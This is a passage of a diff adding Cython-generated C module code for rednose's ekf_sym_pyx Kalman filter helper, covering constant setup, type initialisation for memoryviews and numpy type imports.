177, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__30)) __PYX_ERR(0, 177, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":180 + * raise NotImplementedError() # TODO + * + * def get_augment_times(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_codeobj__31 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_get_augment_times, 180, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__31)) __PYX_ERR(0, 180, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":183 + * raise NotImplementedError() # TODO + * + * def rts_smooth(self, estimates, norm_quats=False): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_tuple__54 = PyTuple_Pack(3, __pyx_n_s_self, __pyx_n_s_estimates, __pyx_n_s_norm_quats); if (unlikely(!__pyx_tuple__54)) __PYX_ERR(0, 183, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__54); + __Pyx_GIVEREF(__pyx_tuple__54); + __pyx_codeobj__32 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__54, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_rts_smooth, 183, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__32)) __PYX_ERR(0, 183, __pyx_L1_error) + __pyx_tuple__55 = PyTuple_Pack(1, Py_False); if (unlikely(!__pyx_tuple__55)) __PYX_ERR(0, 183, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__55); + __Pyx_GIVEREF(__pyx_tuple__55); + + /* "rednose/helpers/ekf_sym_pyx.pyx":186 + * raise NotImplementedError() # TODO + * + * def maha_test(self, x, P, kind, z, R, extra_args=[], maha_thresh=0.95): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + __pyx_tuple__56 = PyTuple_Pack(8, __pyx_n_s_self, __pyx_n_s_x, __pyx_n_s_P, __pyx_n_s_kind, __pyx_n_s_z, __pyx_n_s_R, __pyx_n_s_extra_args, __pyx_n_s_maha_thresh); if (unlikely(!__pyx_tuple__56)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__56); + __Pyx_GIVEREF(__pyx_tuple__56); + __pyx_codeobj__34 = (PyObject*)__Pyx_PyCode_New(8, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__56, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx, __pyx_n_s_maha_test, 186, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__34)) __PYX_ERR(0, 186, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__35 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__35)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_tuple__57 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__57)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__57); + __Pyx_GIVEREF(__pyx_tuple__57); + __pyx_codeobj__36 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__57, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__36)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_float_0_95 = PyFloat_FromDouble(0.95); if (unlikely(!__pyx_float_0_95)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_3 = PyInt_FromLong(3); if (unlikely(!__pyx_int_3)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_112105877 = PyInt_FromLong(112105877L); if (unlikely(!__pyx_int_112105877)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_136983863 = PyInt_FromLong(136983863L); if (unlikely(!__pyx_int_136983863)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_184977713 = PyInt_FromLong(184977713L); if (unlikely(!__pyx_int_184977713)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_neg_1 = PyInt_FromLong(-1); if (unlikely(!__pyx_int_neg_1)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + /* AssertionsEnabled.init */ + __Pyx_init_assertions_enabled(); + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + /* NumpyImportArray.init */ + /* + * Cython has automatically inserted a call to _import_array since + * you didn't include one when you cimported numpy. To disable this + * add the line + * numpy._import_array + */ +#ifdef NPY_FEATURE_VERSION +#if !NO_IMPORT_ARRAY +if (unlikely(_import_array() == -1)) { + PyErr_SetString(PyExc_ImportError, "numpy.core.multiarray failed to import " + "(auto-generated because you didn't call 'numpy.import_array()' after cimporting numpy; " + "use 'numpy._import_array' to disable if you are certain you don't need it)."); +} +#endif +#endif + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __pyx_collections_abc_Sequence = Py_None; Py_INCREF(Py_None); + generic = Py_None; Py_INCREF(Py_None); + strided = Py_None; Py_INCREF(Py_None); + indirect = Py_None; Py_INCREF(Py_None); + contiguous = Py_None; Py_INCREF(Py_None); + indirect_contiguous = Py_None; Py_INCREF(Py_None); + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx_spec, NULL); if (unlikely(!__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx)) __PYX_ERR(0, 81, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx_spec, __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx) < 0) __PYX_ERR(0, 81, __pyx_L1_error) + #else + __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx = &__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx) < 0) __PYX_ERR(0, 81, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_dictoffset && __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_EKF_sym_pyx, (PyObject *) __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx) < 0) __PYX_ERR(0, 81, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx) < 0) __PYX_ERR(0, 81, __pyx_L1_error) + #endif + __pyx_vtabptr_array = &__pyx_vtable_array; + __pyx_vtable_array.get_memview = (PyObject *(*)(struct __pyx_array_obj *))__pyx_array_get_memview; + #if CYTHON_USE_TYPE_SPECS + __pyx_array_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_array_spec, NULL); if (unlikely(!__pyx_array_type)) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_array_type->tp_as_buffer = &__pyx_tp_as_buffer_array; + if (!__pyx_array_type->tp_as_buffer->bf_releasebuffer && __pyx_array_type->tp_base->tp_as_buffer && __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_array_type->tp_as_buffer->bf_releasebuffer = __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_array_spec, __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #else + __pyx_array_type = &__pyx_type___pyx_array; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_array_type->tp_print = 0; + #endif + if (__Pyx_SetVtable(__pyx_array_type, __pyx_vtabptr_array) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_MemviewEnum_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_MemviewEnum_spec, NULL); if (unlikely(!__pyx_MemviewEnum_type)) __PYX_ERR(1, 302, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_MemviewEnum_spec, __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #else + __pyx_MemviewEnum_type = &__pyx_type___pyx_MemviewEnum; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_MemviewEnum_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_MemviewEnum_type->tp_dictoffset && __pyx_MemviewEnum_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_MemviewEnum_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + __pyx_vtabptr_memoryview = &__pyx_vtable_memoryview; + __pyx_vtable_memoryview.get_item_pointer = (char *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_get_item_pointer; + __pyx_vtable_memoryview.is_slice = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_is_slice; + __pyx_vtable_memoryview.setitem_slice_assignment = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_slice_assignment; + __pyx_vtable_memoryview.setitem_slice_assign_scalar = (PyObject *(*)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_setitem_slice_assign_scalar; + __pyx_vtable_memoryview.setitem_indexed = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_indexed; + __pyx_vtable_memoryview.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryview_convert_item_to_object; + __pyx_vtable_memoryview.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryview_assign_item_from_object; + __pyx_vtable_memoryview._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryview__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_memoryview_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryview_spec, NULL); if (unlikely(!__pyx_memoryview_type)) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryview_type->tp_as_buffer = &__pyx_tp_as_buffer_memoryview; + if (!__pyx_memoryview_type->tp_as_buffer->bf_releasebuffer && __pyx_memoryview_type->tp_base->tp_as_buffer && __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_memoryview_type->tp_as_buffer->bf_releasebuffer = __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryview_spec, __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #else + __pyx_memoryview_type = &__pyx_type___pyx_memoryview; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryview_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryview_type->tp_dictoffset && __pyx_memoryview_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryview_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryview_type, __pyx_vtabptr_memoryview) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + __pyx_vtabptr__memoryviewslice = &__pyx_vtable__memoryviewslice; + __pyx_vtable__memoryviewslice.__pyx_base = *__pyx_vtabptr_memoryview; + __pyx_vtable__memoryviewslice.__pyx_base.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryviewslice_convert_item_to_object; + __pyx_vtable__memoryviewslice.__pyx_base.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryviewslice_assign_item_from_object; + __pyx_vtable__memoryviewslice.__pyx_base._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryviewslice__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_t_1 = PyTuple_Pack(1, (PyObject *)__pyx_memoryview_type); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 952, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_memoryviewslice_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryviewslice_spec, __pyx_t_1); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_memoryviewslice_type)) __PYX_ERR(1, 952, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryviewslice_spec, __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #else + __pyx_memoryviewslice_type = &__pyx_type___pyx_memoryviewslice; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryviewslice_type->tp_base = __pyx_memoryview_type; + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryviewslice_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryviewslice_type->tp_dictoffset && __pyx_memoryviewslice_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryviewslice_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryviewslice_type, __pyx_vtabptr__memoryviewslice) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __pyx_t_1 = PyImport_ImportModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_t_1)) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_7cpython_4type_type = __Pyx_ImportType_3_0_0(__pyx_t_1, __Pyx_BUILTIN_MODULE_NAME, "type", + #if defined(PYPY_VERSION_NUM) && PYPY_VERSION_NUM < 0x050B0000 + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #elif CYTHON_COMPILING_IN_LIMITED_API + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #else + sizeof(PyHeapTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyHeapTypeObject), + #endif + __Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_7cpython_4type_type) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyImport_ImportModule("numpy"); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 202, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_5numpy_dtype = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "dtype", sizeof(PyArray_Descr), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArray_Descr),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_dtype) __PYX_ERR(2, 202, __pyx_L1_error) + __pyx_ptype_5numpy_flatiter = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flatiter", sizeof(PyArrayIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_flatiter) __PYX_ERR(2, 225, __pyx_L1_error) + __pyx_ptype_5numpy_broadcast = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "broadcast", sizeof(PyArrayMultiIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayMultiIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_broadcast) __PYX_ERR(2, 229, __pyx_L1_error) + __pyx_ptype_5numpy_ndarray = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ndarray", sizeof(PyArrayObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ndarray) __PYX_ERR(2, 238, __pyx_L1_error) + __pyx_ptype_5numpy_generic = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "generic", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_generic) __PYX_ERR(2, 812, __pyx_L1_error) + __pyx_ptype_5numpy_number = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "number", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_number) __PYX_ERR(2, 814, __pyx_L1_error) + __pyx_ptype_5numpy_integer = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "integer", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_integer) __PYX_ERR(2, 816, __pyx_L1_error) + __pyx_ptype_5numpy_signedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "signedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_signedinteger) __PYX_ERR(2, 818, __pyx_L1_error) + __pyx_ptype_5numpy_unsignedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "unsignedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_unsignedinteger) __PYX_ERR(2, 820, __pyx_L1_error) + __pyx_ptype_5numpy_inexact = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "inexact", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_inexact) __PYX_ERR(2, 822, __pyx_L1_error) + __pyx_ptype_5numpy_floating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "floating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_floating) __PYX_ERR(2, 824, __pyx_L1_error) + __pyx_ptype_5numpy_complexfloating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "complexfloating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_complexfloating) __PYX_ERR(2, 826, __pyx_L1_error) + __pyx_ptype_5numpy_flexible = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flexible", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_flexible) __PYX_ERR(2, 828, __pyx_L1_error) + __pyx_ptype_5numpy_character = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "character", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_character) __PYX_ERR(2, 830, __pyx_L1_error) + __pyx_ptype_5numpy_ufunc = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ufunc", sizeof(PyUFuncObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyUFuncObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ufunc) __PYX_ERR(2, 868, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_ekf_sym_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, 